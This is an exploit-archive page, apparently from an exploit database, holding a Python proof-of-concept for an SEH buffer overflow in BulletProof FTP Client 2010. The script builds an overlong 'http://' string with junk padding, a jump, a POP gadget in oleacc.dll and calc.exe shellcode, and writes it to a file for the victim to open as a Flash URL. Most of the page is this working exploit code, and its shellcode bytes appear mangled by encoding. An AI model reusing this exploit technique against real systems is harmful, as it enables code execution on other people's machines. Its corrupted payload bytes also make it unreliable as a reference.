BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit



EKU-ID: 4202 CVE: OSVDB-ID:
Author: metacom Published: 2014-08-20 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH)
#!/usr/bin/python
# coding: utf-8
# Tested on: Windows XP SP3 EN
# Version: 2010.75.0.76
# Date: 19.08.2014 
# Author: metacom
  
# Download link: http://www.bpftp.com/ 
# Open the -ENTER URL- in filename via File -> Open Flash URL\n";
  
  
head="http://"
junk ="\x41" * 89
  
# 1.\xeb\x06\x90\x90" 
# 2.74C9DE3E   5F POP EDI oleacc.dll
# jump + pop + ShellCode calc.exe Encryption
  
junk+=("됐>ÞÉt1ÉQhcalcT¸Ç“ÂwÿÐ")
  
exploit=head + junk 
try:
    out_file = open("exploit.txt",'w')
    out_file.write(exploit)
    out_file.close()
except:
    print "Error"